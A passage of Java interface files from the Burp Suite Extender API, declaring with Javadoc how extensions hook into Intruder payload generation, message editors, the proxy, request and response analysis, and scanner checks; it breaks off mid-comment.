45 | * getNextPayload() returns the first payload again. This
46 | * method will be invoked when an attack uses the same payload generator for
47 | * more than one payload position, for example in a sniper attack.
48 | */
49 | void reset();
50 | }
51 |
--------------------------------------------------------------------------------
/src/main/java/burp/IIntruderPayloadGeneratorFactory.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IIntruderPayloadGeneratorFactory.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * Extensions can implement this interface and then call
14 | * IBurpExtenderCallbacks.registerIntruderPayloadGeneratorFactory()
15 | * to register a factory for custom Intruder payloads.
16 | */
17 | public interface IIntruderPayloadGeneratorFactory
18 | {
19 | /**
20 | * This method is used by Burp to obtain the name of the payload generator.
21 | * This will be displayed as an option within the Intruder UI when the user
22 | * selects to use extension-generated payloads.
23 | *
24 | * @return The name of the payload generator.
25 | */
26 | String getGeneratorName();
27 |
28 | /**
29 | * This method is used by Burp when the user starts an Intruder attack that
30 | * uses this payload generator.
31 | *
32 | * @param attack An
33 | * IIntruderAttack object that can be queried to obtain details
34 | * about the attack in which the payload generator will be used.
35 | * @return A new instance of
36 | * IIntruderPayloadGenerator that will be used to generate
37 | * payloads for the attack.
38 | */
39 | IIntruderPayloadGenerator createNewInstance(IIntruderAttack attack);
40 | }
41 |
--------------------------------------------------------------------------------
/src/main/java/burp/IIntruderPayloadProcessor.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IIntruderPayloadProcessor.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * Extensions can implement this interface and then call
14 | * IBurpExtenderCallbacks.registerIntruderPayloadProcessor() to
15 | * register a custom Intruder payload processor.
16 | */
17 | public interface IIntruderPayloadProcessor
18 | {
19 | /**
20 | * This method is used by Burp to obtain the name of the payload processor.
21 | * This will be displayed as an option within the Intruder UI when the user
22 | * selects to use an extension-provided payload processor.
23 | *
24 | * @return The name of the payload processor.
25 | */
26 | String getProcessorName();
27 |
28 | /**
29 | * This method is invoked by Burp each time the processor should be applied
30 | * to an Intruder payload.
31 | *
32 | * @param currentPayload The value of the payload to be processed.
33 | * @param originalPayload The value of the original payload prior to
34 | * processing by any already-applied processing rules.
35 | * @param baseValue The base value of the payload position, which will be
36 | * replaced with the current payload.
37 | * @return The value of the processed payload. This may be
38 | * null to indicate that the current payload should be skipped,
39 | * and the attack will move directly to the next payload.
40 | */
41 | byte[] processPayload(
42 | byte[] currentPayload,
43 | byte[] originalPayload,
44 | byte[] baseValue);
45 | }
46 |
--------------------------------------------------------------------------------
/src/main/java/burp/IMenuItemHandler.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IMenuItemHandler.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * Extensions can implement this interface and then call
14 | * IBurpExtenderCallbacks.registerMenuItem() to register a custom
15 | * context menu item.
16 | *
17 | * @deprecated Use
18 | * IContextMenuFactory instead.
19 | */
20 | @Deprecated
21 | public interface IMenuItemHandler
22 | {
23 | /**
24 | * This method is invoked by Burp Suite when the user clicks on a custom
25 | * menu item which the extension has registered with Burp.
26 | *
27 | * @param menuItemCaption The caption of the menu item which was clicked.
28 | * This parameter enables extensions to provide a single implementation
29 | * which handles multiple different menu items.
30 | * @param messageInfo Details of the HTTP message(s) for which the context
31 | * menu was displayed.
32 | */
33 | void menuItemClicked(
34 | String menuItemCaption,
35 | IHttpRequestResponse[] messageInfo);
36 | }
37 |
--------------------------------------------------------------------------------
/src/main/java/burp/IMessageEditor.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IMessageEditor.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | import java.awt.Component;
13 |
14 | /**
15 | * This interface is used to provide extensions with an instance of Burp's HTTP
16 | * message editor, for the extension to use in its own UI. Extensions should
17 | * call IBurpExtenderCallbacks.createMessageEditor() to obtain an
18 | * instance of this interface.
19 | */
20 | public interface IMessageEditor
21 | {
22 |
23 | /**
24 | * This method returns the UI component of the editor, for extensions to add
25 | * to their own UI.
26 | *
27 | * @return The UI component of the editor.
28 | */
29 | Component getComponent();
30 |
31 | /**
32 | * This method is used to display an HTTP message in the editor.
33 | *
34 | * @param message The HTTP message to be displayed.
35 | * @param isRequest Flags whether the message is an HTTP request or
36 | * response.
37 | */
38 | void setMessage(byte[] message, boolean isRequest);
39 |
40 | /**
41 | * This method is used to retrieve the currently displayed message, which
42 | * may have been modified by the user.
43 | *
44 | * @return The currently displayed HTTP message.
45 | */
46 | byte[] getMessage();
47 |
48 | /**
49 | * This method is used to determine whether the current message has been
50 | * modified by the user.
51 | *
52 | * @return An indication of whether the current message has been modified by
53 | * the user since it was first displayed.
54 | */
55 | boolean isMessageModified();
56 |
57 | /**
58 | * This method returns the data that is currently selected by the user.
59 | *
60 | * @return The data that is currently selected by the user, or
61 | * null if no selection is made.
62 | */
63 | byte[] getSelectedData();
64 |
65 | /**
66 | * This method can be used to retrieve the bounds of the user's selection
67 | * into the displayed message, if applicable.
68 | *
69 | * @return An int[2] array containing the start and end offsets of the
70 | * user's selection within the displayed message. If the user has not made
71 | * any selection in the current message, both offsets indicate the position
72 | * of the caret within the editor. For some editor views, the concept of
73 | * selection within the message does not apply, in which case this method
74 | * returns null.
75 | */
76 | int[] getSelectionBounds();
77 | }
78 |
--------------------------------------------------------------------------------
/src/main/java/burp/IMessageEditorController.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IMessageEditorController.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * This interface is used by an
14 | * IMessageEditor to obtain details about the currently displayed
15 | * message. Extensions that create instances of Burp's HTTP message editor can
16 | * optionally provide an implementation of
17 | * IMessageEditorController, which the editor will invoke when it
18 | * requires further information about the current message (for example, to send
19 | * it to another Burp tool). Extensions that provide custom editor tabs via an
20 | * IMessageEditorTabFactory will receive a reference to an
21 | * IMessageEditorController object for each tab instance they
22 | * generate, which the tab can invoke if it requires further information about
23 | * the current message.
24 | */
25 | public interface IMessageEditorController
26 | {
27 | /**
28 | * This method is used to retrieve the HTTP service for the current message.
29 | *
30 | * @return The HTTP service for the current message.
31 | */
32 | IHttpService getHttpService();
33 |
34 | /**
35 | * This method is used to retrieve the HTTP request associated with the
36 | * current message (which may itself be a response).
37 | *
38 | * @return The HTTP request associated with the current message.
39 | */
40 | byte[] getRequest();
41 |
42 | /**
43 | * This method is used to retrieve the HTTP response associated with the
44 | * current message (which may itself be a request).
45 | *
46 | * @return The HTTP response associated with the current message.
47 | */
48 | byte[] getResponse();
49 | }
50 |
--------------------------------------------------------------------------------
/src/main/java/burp/IMessageEditorTab.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IMessageEditorTab.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | import java.awt.Component;
13 |
14 | /**
15 | * Extensions that register an
16 | * IMessageEditorTabFactory must return instances of this
17 | * interface, which Burp will use to create custom tabs within its HTTP message
18 | * editors.
19 | */
20 | public interface IMessageEditorTab
21 | {
22 | /**
23 | * This method returns the caption that should appear on the custom tab when
24 | * it is displayed. Note: Burp invokes this method once when the tab
25 | * is first generated, and the same caption will be used every time the tab
26 | * is displayed.
27 | *
28 | * @return The caption that should appear on the custom tab when it is
29 | * displayed.
30 | */
31 | String getTabCaption();
32 |
33 | /**
34 | * This method returns the component that should be used as the contents of
35 | * the custom tab when it is displayed. Note: Burp invokes this
36 | * method once when the tab is first generated, and the same component will
37 | * be used every time the tab is displayed.
38 | *
39 | * @return The component that should be used as the contents of the custom
40 | * tab when it is displayed.
41 | */
42 | Component getUiComponent();
43 |
44 | /**
45 | * The hosting editor will invoke this method before it displays a new HTTP
46 | * message, so that the custom tab can indicate whether it should be enabled
47 | * for that message.
48 | *
49 | * @param content The message that is about to be displayed, or a zero-length
50 | * array if the existing message is to be cleared.
51 | * @param isRequest Indicates whether the message is a request or a
52 | * response.
53 | * @return The method should return
54 | * true if the custom tab is able to handle the specified
55 | * message, and so will be displayed within the editor. Otherwise, the tab
56 | * will be hidden while this message is displayed.
57 | */
58 | boolean isEnabled(byte[] content, boolean isRequest);
59 |
60 | /**
61 | * The hosting editor will invoke this method to display a new message or to
62 | * clear the existing message. This method will only be called with a new
63 | * message if the tab has already returned
64 | * true to a call to
65 | * isEnabled() with the same message details.
66 | *
67 | * @param content The message that is to be displayed, or
68 | * null if the tab should clear its contents and disable any
69 | * editable controls.
70 | * @param isRequest Indicates whether the message is a request or a
71 | * response.
72 | */
73 | void setMessage(byte[] content, boolean isRequest);
74 |
75 | /**
76 | * This method returns the currently displayed message.
77 | *
78 | * @return The currently displayed message.
79 | */
80 | byte[] getMessage();
81 |
82 | /**
83 | * This method is used to determine whether the currently displayed message
84 | * has been modified by the user. The hosting editor will always call
85 | * getMessage() before calling this method, so any pending
86 | * edits should be completed within
87 | * getMessage().
88 | *
89 | * @return The method should return
90 | * true if the user has modified the current message since it
91 | * was first displayed.
92 | */
93 | boolean isModified();
94 |
95 | /**
96 | * This method is used to retrieve the data that is currently selected by
97 | * the user.
98 | *
99 | * @return The data that is currently selected by the user. This may be
100 | * null if no selection is currently made.
101 | */
102 | byte[] getSelectedData();
103 | }
104 |
--------------------------------------------------------------------------------
/src/main/java/burp/IMessageEditorTabFactory.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IMessageEditorTabFactory.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * Extensions can implement this interface and then call
14 | * IBurpExtenderCallbacks.registerMessageEditorTabFactory() to
15 | * register a factory for custom message editor tabs. This allows extensions to
16 | * provide custom rendering or editing of HTTP messages, within Burp's own HTTP
17 | * editor.
18 | */
19 | public interface IMessageEditorTabFactory
20 | {
21 | /**
22 | * Burp will call this method once for each HTTP message editor, and the
23 | * factory should provide a new instance of an
24 | * IMessageEditorTab object.
25 | *
26 | * @param controller An
27 | * IMessageEditorController object, which the new tab can query
28 | * to retrieve details about the currently displayed message. This may be
29 | * null for extension-invoked message editors where the
30 | * extension has not provided an editor controller.
31 | * @param editable Indicates whether the hosting editor is editable or
32 | * read-only.
33 | * @return A new
34 | * IMessageEditorTab object for use within the message editor.
35 | */
36 | IMessageEditorTab createNewInstance(IMessageEditorController controller,
37 | boolean editable);
38 | }
39 |
--------------------------------------------------------------------------------
/src/main/java/burp/IParameter.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IParameter.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * This interface is used to hold details about an HTTP request parameter.
14 | */
15 | public interface IParameter
16 | {
17 | /**
18 | * Used to indicate a parameter within the URL query string.
19 | */
20 | static final byte PARAM_URL = 0;
21 | /**
22 | * Used to indicate a parameter within the message body.
23 | */
24 | static final byte PARAM_BODY = 1;
25 | /**
26 | * Used to indicate an HTTP cookie.
27 | */
28 | static final byte PARAM_COOKIE = 2;
29 | /**
30 | * Used to indicate an item of data within an XML structure.
31 | */
32 | static final byte PARAM_XML = 3;
33 | /**
34 | * Used to indicate the value of a tag attribute within an XML structure.
35 | */
36 | static final byte PARAM_XML_ATTR = 4;
37 | /**
38 | * Used to indicate the value of a parameter attribute within a multi-part
39 | * message body (such as the name of an uploaded file).
40 | */
41 | static final byte PARAM_MULTIPART_ATTR = 5;
42 | /**
43 | * Used to indicate an item of data within a JSON structure.
44 | */
45 | static final byte PARAM_JSON = 6;
46 |
47 | /**
48 | * This method is used to retrieve the parameter type.
49 | *
50 | * @return The parameter type. The available types are defined within this
51 | * interface.
52 | */
53 | byte getType();
54 |
55 | /**
56 | * This method is used to retrieve the parameter name.
57 | *
58 | * @return The parameter name.
59 | */
60 | String getName();
61 |
62 | /**
63 | * This method is used to retrieve the parameter value.
64 | *
65 | * @return The parameter value.
66 | */
67 | String getValue();
68 |
69 | /**
70 | * This method is used to retrieve the start offset of the parameter name
71 | * within the HTTP request.
72 | *
73 | * @return The start offset of the parameter name within the HTTP request,
74 | * or -1 if the parameter is not associated with a specific request.
75 | */
76 | int getNameStart();
77 |
78 | /**
79 | * This method is used to retrieve the end offset of the parameter name
80 | * within the HTTP request.
81 | *
82 | * @return The end offset of the parameter name within the HTTP request, or
83 | * -1 if the parameter is not associated with a specific request.
84 | */
85 | int getNameEnd();
86 |
87 | /**
88 | * This method is used to retrieve the start offset of the parameter value
89 | * within the HTTP request.
90 | *
91 | * @return The start offset of the parameter value within the HTTP request,
92 | * or -1 if the parameter is not associated with a specific request.
93 | */
94 | int getValueStart();
95 |
96 | /**
97 | * This method is used to retrieve the end offset of the parameter value
98 | * within the HTTP request.
99 | *
100 | * @return The end offset of the parameter value within the HTTP request, or
101 | * -1 if the parameter is not associated with a specific request.
102 | */
103 | int getValueEnd();
104 | }
105 |
--------------------------------------------------------------------------------
/src/main/java/burp/IProxyListener.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IProxyListener.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * Extensions can implement this interface and then call
14 | * IBurpExtenderCallbacks.registerProxyListener() to register a
15 | * Proxy listener. The listener will be notified of requests and responses being
16 | * processed by the Proxy tool. Extensions can perform custom analysis or
17 | * modification of these messages, and control in-UI message interception, by
18 | * registering a proxy listener.
19 | */
20 | public interface IProxyListener
21 | {
22 | /**
23 | * This method is invoked when an HTTP message is being processed by the
24 | * Proxy.
25 | *
26 | * @param messageIsRequest Indicates whether the HTTP message is a request
27 | * or a response.
28 | * @param message An
29 | * IInterceptedProxyMessage object that extensions can use to
30 | * query and update details of the message, and control whether the message
31 | * should be intercepted and displayed to the user for manual review or
32 | * modification.
33 | */
34 | void processProxyMessage(
35 | boolean messageIsRequest,
36 | IInterceptedProxyMessage message);
37 | }
38 |
--------------------------------------------------------------------------------
/src/main/java/burp/IRequestInfo.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IRequestInfo.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | import java.net.URL;
13 | import java.util.List;
14 |
15 | /**
16 | * This interface is used to retrieve key details about an HTTP request.
17 | * Extensions can obtain an
18 | * IRequestInfo object for a given request by calling
19 | * IExtensionHelpers.analyzeRequest().
20 | */
21 | public interface IRequestInfo
22 | {
23 | /**
24 | * Used to indicate that there is no content.
25 | */
26 | static final byte CONTENT_TYPE_NONE = 0;
27 | /**
28 | * Used to indicate URL-encoded content.
29 | */
30 | static final byte CONTENT_TYPE_URL_ENCODED = 1;
31 | /**
32 | * Used to indicate multi-part content.
33 | */
34 | static final byte CONTENT_TYPE_MULTIPART = 2;
35 | /**
36 | * Used to indicate XML content.
37 | */
38 | static final byte CONTENT_TYPE_XML = 3;
39 | /**
40 | * Used to indicate JSON content.
41 | */
42 | static final byte CONTENT_TYPE_JSON = 4;
43 | /**
44 | * Used to indicate AMF content.
45 | */
46 | static final byte CONTENT_TYPE_AMF = 5;
47 | /**
48 | * Used to indicate unknown content.
49 | */
50 | static final byte CONTENT_TYPE_UNKNOWN = -1;
51 |
52 | /**
53 | * This method is used to obtain the HTTP method used in the request.
54 | *
55 | * @return The HTTP method used in the request.
56 | */
57 | String getMethod();
58 |
59 | /**
60 | * This method is used to obtain the URL in the request.
61 | *
62 | * @return The URL in the request.
63 | */
64 | URL getUrl();
65 |
66 | /**
67 | * This method is used to obtain the HTTP headers contained in the request.
68 | *
69 | * @return The HTTP headers contained in the request.
70 | */
71 | List getHeaders();
72 |
73 | /**
74 | * This method is used to obtain the parameters contained in the request.
75 | *
76 | * @return The parameters contained in the request.
77 | */
78 | List getParameters();
79 |
80 | /**
81 | * This method is used to obtain the offset within the request where the
82 | * message body begins.
83 | *
84 | * @return The offset within the request where the message body begins.
85 | */
86 | int getBodyOffset();
87 |
88 | /**
89 | * This method is used to obtain the content type of the message body.
90 | *
91 | * @return An indication of the content type of the message body. Available
92 | * types are defined within this interface.
93 | */
94 | byte getContentType();
95 | }
96 |
--------------------------------------------------------------------------------
/src/main/java/burp/IResponseInfo.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IResponseInfo.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | import java.util.List;
13 |
14 | /**
15 | * This interface is used to retrieve key details about an HTTP response.
16 | * Extensions can obtain an
17 | * IResponseInfo object for a given response by calling
18 | * IExtensionHelpers.analyzeResponse().
19 | */
20 | public interface IResponseInfo
21 | {
22 | /**
23 | * This method is used to obtain the HTTP headers contained in the response.
24 | *
25 | * @return The HTTP headers contained in the response.
26 | */
27 | List getHeaders();
28 |
29 | /**
30 | * This method is used to obtain the offset within the response where the
31 | * message body begins.
32 | *
33 | * @return The offset within the response where the message body begins.
34 | */
35 | int getBodyOffset();
36 |
37 | /**
38 | * This method is used to obtain the HTTP status code contained in the
39 | * response.
40 | *
41 | * @return The HTTP status code contained in the response.
42 | */
43 | short getStatusCode();
44 |
45 | /**
46 | * This method is used to obtain details of the HTTP cookies set in the
47 | * response.
48 | *
49 | * @return A list of ICookie objects representing the cookies
50 | * set in the response, if any.
51 | */
52 | List getCookies();
53 |
54 | /**
55 | * This method is used to obtain the MIME type of the response, as stated in
56 | * the HTTP headers.
57 | *
58 | * @return A textual label for the stated MIME type, or an empty String if
59 | * this is not known or recognized. The possible labels are the same as
60 | * those used in the main Burp UI.
61 | */
62 | String getStatedMimeType();
63 |
64 | /**
65 | * This method is used to obtain the MIME type of the response, as inferred
66 | * from the contents of the HTTP message body.
67 | *
68 | * @return A textual label for the inferred MIME type, or an empty String if
69 | * this is not known or recognized. The possible labels are the same as
70 | * those used in the main Burp UI.
71 | */
72 | String getInferredMimeType();
73 | }
74 |
--------------------------------------------------------------------------------
/src/main/java/burp/IResponseKeywords.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IResponseKeywords.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | import java.util.List;
13 |
14 | /**
15 | * This interface is used to represent the counts of keywords appearing in a
16 | * number of HTTP responses.
17 | */
18 | public interface IResponseKeywords
19 | {
20 |
21 | /**
22 | * This method is used to obtain the list of keywords whose counts vary
23 | * between the analyzed responses.
24 | *
25 | * @return The keywords whose counts vary between the analyzed responses.
26 | */
27 | List getVariantKeywords();
28 |
29 | /**
30 | * This method is used to obtain the list of keywords whose counts do not
31 | * vary between the analyzed responses.
32 | *
33 | * @return The keywords whose counts do not vary between the analyzed
34 | * responses.
35 | */
36 | List getInvariantKeywords();
37 |
38 | /**
39 | * This method is used to obtain the number of occurrences of an individual
40 | * keyword in a response.
41 | *
42 | * @param keyword The keyword whose count will be retrieved.
43 | * @param responseIndex The index of the response. Note responses are
44 | * indexed from zero in the order they were originally supplied to the
45 | * IExtensionHelpers.analyzeResponseKeywords() and
46 | * IResponseKeywords.updateWith() methods.
47 | * @return The number of occurrences of the specified keyword for the
48 | * specified response.
49 | */
50 | int getKeywordCount(String keyword, int responseIndex);
51 |
52 | /**
53 | * This method is used to update the analysis based on additional responses.
54 | *
55 | * @param responses The new responses to include in the analysis.
56 | */
57 | void updateWith(byte[]... responses);
58 | }
59 |
--------------------------------------------------------------------------------
/src/main/java/burp/IResponseVariations.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IResponseVariations.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | import java.util.List;
13 |
14 | /**
15 | * This interface is used to represent variations between a number HTTP
16 | * responses, according to various attributes.
17 | */
18 | public interface IResponseVariations
19 | {
20 |
21 | /**
22 | * This method is used to obtain the list of attributes that vary between
23 | * the analyzed responses.
24 | *
25 | * @return The attributes that vary between the analyzed responses.
26 | */
27 | List getVariantAttributes();
28 |
29 | /**
30 | * This method is used to obtain the list of attributes that do not vary
31 | * between the analyzed responses.
32 | *
33 | * @return The attributes that do not vary between the analyzed responses.
34 | */
35 | List getInvariantAttributes();
36 |
37 | /**
38 | * This method is used to obtain the value of an individual attribute in a
39 | * response. Note that the values of some attributes are intrinsically
40 | * meaningful (e.g. a word count) while the values of others are less so
41 | * (e.g. a checksum of the HTML tag names).
42 | *
43 | * @param attributeName The name of the attribute whose value will be
44 | * retrieved. Extension authors can obtain the list of supported attributes
45 | * by generating an IResponseVariations object for a single
46 | * response and calling
47 | * IResponseVariations.getInvariantAttributes().
48 | * @param responseIndex The index of the response. Note that responses are
49 | * indexed from zero in the order they were originally supplied to the
50 | * IExtensionHelpers.analyzeResponseVariations() and
51 | * IResponseVariations.updateWith() methods.
52 | * @return The value of the specified attribute for the specified response.
53 | */
54 | int getAttributeValue(String attributeName, int responseIndex);
55 |
56 | /**
57 | * This method is used to update the analysis based on additional responses.
58 | *
59 | * @param responses The new responses to include in the analysis.
60 | */
61 | void updateWith(byte[]... responses);
62 | }
63 |
--------------------------------------------------------------------------------
/src/main/java/burp/IScanIssue.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IScanIssue.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * This interface is used to retrieve details of Scanner issues. Extensions can
14 | * obtain details of issues by registering an IScannerListener or
15 | * by calling IBurpExtenderCallbacks.getScanIssues(). Extensions
16 | * can also add custom Scanner issues by registering an
17 | * IScannerCheck or calling
18 | * IBurpExtenderCallbacks.addScanIssue(), and providing their own
19 | * implementations of this interface. Note that issue descriptions and other
20 | * text generated by extensions are subject to an HTML whitelist that allows
21 | * only formatting tags and simple hyperlinks.
22 | */
23 | public interface IScanIssue
24 | {
25 |
26 | /**
27 | * This method returns the URL for which the issue was generated.
28 | *
29 | * @return The URL for which the issue was generated.
30 | */
31 | java.net.URL getUrl();
32 |
33 | /**
34 | * This method returns the name of the issue type.
35 | *
36 | * @return The name of the issue type (e.g. "SQL injection").
37 | */
38 | String getIssueName();
39 |
40 | /**
41 | * This method returns a numeric identifier of the issue type. See the Burp
42 | * Scanner help documentation for a listing of all the issue types.
43 | *
44 | * @return A numeric identifier of the issue type.
45 | */
46 | int getIssueType();
47 |
48 | /**
49 | * This method returns the issue severity level.
50 | *
51 | * @return The issue severity level. Expected values are "High", "Medium",
52 | * "Low", "Information" or "False positive".
53 | *
54 | */
55 | String getSeverity();
56 |
57 | /**
58 | * This method returns the issue confidence level.
59 | *
60 | * @return The issue confidence level. Expected values are "Certain", "Firm"
61 | * or "Tentative".
62 | */
63 | String getConfidence();
64 |
65 | /**
66 | * This method returns a background description for this type of issue.
67 | *
68 | * @return A background description for this type of issue, or
69 | * null if none applies. A limited set of HTML tags may be
70 | * used.
71 | */
72 | String getIssueBackground();
73 |
74 | /**
75 | * This method returns a background description of the remediation for this
76 | * type of issue.
77 | *
78 | * @return A background description of the remediation for this type of
79 | * issue, or null if none applies. A limited set of HTML tags
80 | * may be used.
81 | */
82 | String getRemediationBackground();
83 |
84 | /**
85 | * This method returns detailed information about this specific instance of
86 | * the issue.
87 | *
88 | * @return Detailed information about this specific instance of the issue,
89 | * or null if none applies. A limited set of HTML tags may be
90 | * used.
91 | */
92 | String getIssueDetail();
93 |
94 | /**
95 | * This method returns detailed information about the remediation for this
96 | * specific instance of the issue.
97 | *
98 | * @return Detailed information about the remediation for this specific
99 | * instance of the issue, or null if none applies. A limited
100 | * set of HTML tags may be used.
101 | */
102 | String getRemediationDetail();
103 |
104 | /**
105 | * This method returns the HTTP messages on the basis of which the issue was
106 | * generated.
107 | *
108 | * @return The HTTP messages on the basis of which the issue was generated.
109 | * Note: The items in this array should be instances of
110 | * IHttpRequestResponseWithMarkers if applicable, so that
111 | * details of the relevant portions of the request and response messages are
112 | * available.
113 | */
114 | IHttpRequestResponse[] getHttpMessages();
115 |
116 | /**
117 | * This method returns the HTTP service for which the issue was generated.
118 | *
119 | * @return The HTTP service for which the issue was generated.
120 | */
121 | IHttpService getHttpService();
122 |
123 | }
124 |
--------------------------------------------------------------------------------
/src/main/java/burp/IScanQueueItem.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IScanQueueItem.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * This interface is used to retrieve details of items in the Burp Scanner
14 | * active scan queue. Extensions can obtain references to scan queue items by
15 | * calling
16 | * IBurpExtenderCallbacks.doActiveScan().
17 | */
18 | public interface IScanQueueItem
19 | {
20 | /**
21 | * This method returns a description of the status of the scan queue item.
22 | *
23 | * @return A description of the status of the scan queue item.
24 | */
25 | String getStatus();
26 |
27 | /**
28 | * This method returns an indication of the percentage completed for the
29 | * scan queue item.
30 | *
31 | * @return An indication of the percentage completed for the scan queue
32 | * item.
33 | */
34 | byte getPercentageComplete();
35 |
36 | /**
37 | * This method returns the number of requests that have been made for the
38 | * scan queue item.
39 | *
40 | * @return The number of requests that have been made for the scan queue
41 | * item.
42 | */
43 | int getNumRequests();
44 |
45 | /**
46 | * This method returns the number of network errors that have occurred for
47 | * the scan queue item.
48 | *
49 | * @return The number of network errors that have occurred for the scan
50 | * queue item.
51 | */
52 | int getNumErrors();
53 |
54 | /**
55 | * This method returns the number of attack insertion points being used for
56 | * the scan queue item.
57 | *
58 | * @return The number of attack insertion points being used for the scan
59 | * queue item.
60 | */
61 | int getNumInsertionPoints();
62 |
63 | /**
64 | * This method allows the scan queue item to be canceled.
65 | */
66 | void cancel();
67 |
68 | /**
69 | * This method returns details of the issues generated for the scan queue
70 | * item. Note: different items within the scan queue may contain
71 | * duplicated versions of the same issues - for example, if the same request
72 | * has been scanned multiple times. Duplicated issues are consolidated in
73 | * the main view of scan results. Extensions can register an
74 | * IScannerListener to get details only of unique, newly
75 | * discovered Scanner issues post-consolidation.
76 | *
77 | * @return Details of the issues generated for the scan queue item.
78 | */
79 | IScanIssue[] getIssues();
80 | }
81 |
--------------------------------------------------------------------------------
/src/main/java/burp/IScannerCheck.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IScannerCheck.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | import java.util.List;
13 |
14 | /**
15 | * Extensions can implement this interface and then call
16 | * IBurpExtenderCallbacks.registerScannerCheck() to register a
17 | * custom Scanner check. When performing scanning, Burp will ask the check to
18 | * perform active or passive scanning on the base request, and report any
19 | * Scanner issues that are identified.
20 | */
21 | public interface IScannerCheck
22 | {
23 |
24 | /**
25 | * The Scanner invokes this method for each base request / response that is
26 | * passively scanned. Note: Extensions should only analyze the
27 | * HTTP messages provided during passive scanning, and should not make any
28 | * new HTTP requests of their own.
29 | *
30 | * @param baseRequestResponse The base HTTP request / response that should
31 | * be passively scanned.
32 | * @return A list of IScanIssue objects, or null
33 | * if no issues are identified.
34 | */
35 | List doPassiveScan(IHttpRequestResponse baseRequestResponse);
36 |
37 | /**
38 | * The Scanner invokes this method for each insertion point that is actively
39 | * scanned. Extensions may issue HTTP requests as required to carry out
40 | * active scanning, and should use the
41 | * IScannerInsertionPoint object provided to build scan
42 | * requests for particular payloads.
43 | * Note:
